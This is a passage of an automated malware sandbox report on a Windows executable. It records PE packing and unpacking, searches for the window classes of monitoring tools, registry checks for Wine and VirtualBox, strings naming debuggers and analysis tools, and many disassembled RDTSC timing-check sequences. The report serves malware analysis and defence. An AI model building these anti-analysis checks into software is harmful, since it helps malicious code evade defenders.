Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSection loaded: kernel.appcore.dllJump to behavior
Source: 2M43DSi2cx.exeStatic file information: File size 4483072 > 1048576
Source: 2M43DSi2cx.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x284c00
Source: 2M43DSi2cx.exeStatic PE information: Raw size of zicceeoj is bigger than: 0x100000 < 0x1be000

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\2M43DSi2cx.exeUnpacked PE file: 0.2.2M43DSi2cx.exe.420000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zicceeoj:EW;xmbctvay:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zicceeoj:EW;xmbctvay:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: 2M43DSi2cx.exeStatic PE information: real checksum: 0x455408 should be: 0x448350
Source: 2M43DSi2cx.exeStatic PE information: section name:
Source: 2M43DSi2cx.exeStatic PE information: section name: .idata
Source: 2M43DSi2cx.exeStatic PE information: section name:
Source: 2M43DSi2cx.exeStatic PE information: section name: zicceeoj
Source: 2M43DSi2cx.exeStatic PE information: section name: xmbctvay
Source: 2M43DSi2cx.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0152D0DF push eax; iretd 0_3_0152D3F5
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0152D0DF push eax; iretd 0_3_0152D3F5
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0152D0DF push eax; iretd 0_3_0152D3F5
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0151507A push eax; ret 0_3_01515099
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0151507A push eax; ret 0_3_01515099
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0151260B push ebp; retf 0003h0_3_0151260C
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0151260B push ebp; retf 0003h0_3_0151260C
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_01516F23 pushfd ; iretd 0_3_01516F6A
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_01516F23 pushfd ; iretd 0_3_01516F6A
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_014CC158 push esi; retn 0047h0_3_014CC15A
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0152D0DF push eax; iretd 0_3_0152D3F5
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0152D0DF push eax; iretd 0_3_0152D3F5
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0152D0DF push eax; iretd 0_3_0152D3F5
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0151507A push eax; ret 0_3_01515099
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0151507A push eax; ret 0_3_01515099
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0151260B push ebp; retf 0003h0_3_0151260C
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0151260B push ebp; retf 0003h0_3_0151260C
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_01516F23 pushfd ; iretd 0_3_01516F6A
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_01516F23 pushfd ; iretd 0_3_01516F6A
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_014CC158 push esi; retn 0047h0_3_014CC15A
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0152D0DF push eax; iretd 0_3_0152D3F5
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0152D0DF push eax; iretd 0_3_0152D3F5
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0152D0DF push eax; iretd 0_3_0152D3F5
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0151507A push eax; ret 0_3_01515099
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0151507A push eax; ret 0_3_01515099
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0151260B push ebp; retf 0003h0_3_0151260C
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_0151260B push ebp; retf 0003h0_3_0151260C
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_01516F23 pushfd ; iretd 0_3_01516F6A
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_3_01516F23 pushfd ; iretd 0_3_01516F6A
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_007A41D0 push eax; mov dword ptr [esp], edx0_2_007A41D5
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_004A2340 push eax; mov dword ptr [esp], 00000000h0_2_004A2343
Source: 2M43DSi2cx.exeStatic PE information: section name: zicceeoj entropy: 7.954541903209299

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\2M43DSi2cx.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\2M43DSi2cx.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: B6C089 second address: B6B971 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2BDCD5A7B2h 0x00000008 jmp 00007F2BDCD5A7ACh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F2BDCD5A7B3h 0x00000015 nop 0x00000016 jno 00007F2BDCD5A7ACh 0x0000001c push dword ptr [ebp+12A216EDh] 0x00000022 mov dword ptr [ebp+12A2219Ah], edx 0x00000028 call dword ptr [ebp+12A21ED5h] 0x0000002e pushad 0x0000002f cld 0x00000030 mov dword ptr [ebp+12A21B75h], ecx 0x00000036 xor eax, eax 0x00000038 jp 00007F2BDCD5A7ACh 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 mov dword ptr [ebp+12A21B75h], edx 0x00000048 mov dword ptr [ebp+12A227E5h], eax 0x0000004e jc 00007F2BDCD5A7B4h 0x00000054 pushad 0x00000055 mov ebx, dword ptr [ebp+12A228E5h] 0x0000005b add edi, dword ptr [ebp+12A22849h] 0x00000061 popad 0x00000062 jmp 00007F2BDCD5A7B8h 0x00000067 mov esi, 0000003Ch 0x0000006c pushad 0x0000006d push edi 0x0000006e mov ebx, 65149622h 0x00000073 pop ecx 0x00000074 mov ebx, 0B0975EBh 0x00000079 popad 0x0000007a add esi, dword ptr [esp+24h] 0x0000007e mov dword ptr [ebp+12A21B75h], eax 0x00000084 lodsw 0x00000086 pushad 0x00000087 jg 00007F2BDCD5A7A9h 0x0000008d mov ebx, ecx 0x0000008f popad 0x00000090 add eax, dword ptr [esp+24h] 0x00000094 mov dword ptr [ebp+12A21B9Dh], ecx 0x0000009a mov ebx, dword ptr [esp+24h] 0x0000009e jmp 00007F2BDCD5A7ABh 0x000000a3 nop 0x000000a4 push edi 0x000000a5 push ebx 0x000000a6 push eax 0x000000a7 push edx 0x000000a8 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: B6B971 second address: B6B98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007F2BDC8ABB23h 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CF45AA second address: CF45B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CF366C second address: CF3683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB21h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CF3BA1 second address: CF3BA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CF3E5B second address: CF3E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CF5EFA second address: CF5F04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F2BDCD5A7A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CF5F04 second address: CF5F08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CF5F08 second address: CF5F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F2BDCD5A7B1h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CF5F27 second address: CF5F2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CF6027 second address: CF6078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jc 00007F2BDCD5A7A6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007F2BDCD5A7B4h 0x00000015 pop eax 0x00000016 jmp 00007F2BDCD5A7AAh 0x0000001b lea ebx, dword ptr [ebp+12BADD89h] 0x00000021 mov ch, bh 0x00000023 xchg eax, ebx 0x00000024 jmp 00007F2BDCD5A7ADh 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d je 00007F2BDCD5A7A6h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CF6078 second address: CF607D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CF6237 second address: CF6241 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CF6241 second address: CF6245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CF6293 second address: CF62A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CF62A6 second address: CF62AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CF62AC second address: CF62B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D08CDC second address: D08CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D16C61 second address: D16C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CDF3E4 second address: CDF3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2BDC8ABB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CDF3EE second address: CDF403 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2BDCD5A7A6h 0x00000008 jmp 00007F2BDCD5A7ABh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CDF403 second address: CDF409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CDF409 second address: CDF41C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2BDCD5A7AFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CDF41C second address: CDF420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CDF420 second address: CDF426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D14C64 second address: D14C6A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D1508A second address: D1508E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D1508E second address: D15092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D151CE second address: D151D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D151D4 second address: D151DE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2BDC8ABB1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D151DE second address: D151FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F2BDCD5A7B5h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D151FB second address: D15233 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB1Ch 0x00000007 je 00007F2BDC8ABB16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 je 00007F2BDC8ABB45h 0x00000017 jmp 00007F2BDC8ABB24h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D15512 second address: D1554C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2BDCD5A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2BDCD5A7B9h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 pop eax 0x00000017 jmp 00007F2BDCD5A7AEh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D1554C second address: D1556B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB25h 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F2BDC8ABB16h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D15A7E second address: D15A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D0C14E second address: D0C16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2BDC8ABB16h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F2BDC8ABB1Ch 0x00000013 push edx 0x00000014 pop edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D1642B second address: D1642F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D19CB8 second address: D19CBD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CE2A95 second address: CE2A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CE2A9A second address: CE2AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D1CBA4 second address: D1CBA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D1CBA8 second address: D1CBB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F2BDC8ABB16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D1CBB6 second address: D1CBBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D1CD6D second address: D1CD73 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D1CD73 second address: D1CDD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F2BDCD5A7B3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jc 00007F2BDCD5A7ACh 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push ebx 0x0000001f jmp 00007F2BDCD5A7B2h 0x00000024 pop ebx 0x00000025 mov eax, dword ptr [eax] 0x00000027 pushad 0x00000028 jmp 00007F2BDCD5A7B7h 0x0000002d pushad 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D1E107 second address: D1E10F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CE4493 second address: CE44B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F2BDCD5A7B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D24725 second address: D24747 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2BDC8ABB21h 0x00000009 jmp 00007F2BDC8ABB1Dh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D23B92 second address: D23BA0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2BDCD5A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D23BA0 second address: D23BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D23BA4 second address: D23BA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D23BA8 second address: D23BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F2BDC8ABB1Dh 0x0000000e jmp 00007F2BDC8ABB1Bh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jbe 00007F2BDC8ABB16h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D23FEF second address: D24005 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007F2BDCD5A7A6h 0x0000000f jng 00007F2BDCD5A7A6h 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D24005 second address: D2400A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D24DCE second address: D24DD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D24F24 second address: D24F38 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jns 00007F2BDC8ABB16h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D24F38 second address: D24F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D250D1 second address: D250D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D25272 second address: D25276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D25CDB second address: D25CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2BDC8ABB16h 0x0000000a popad 0x0000000b rdtsc
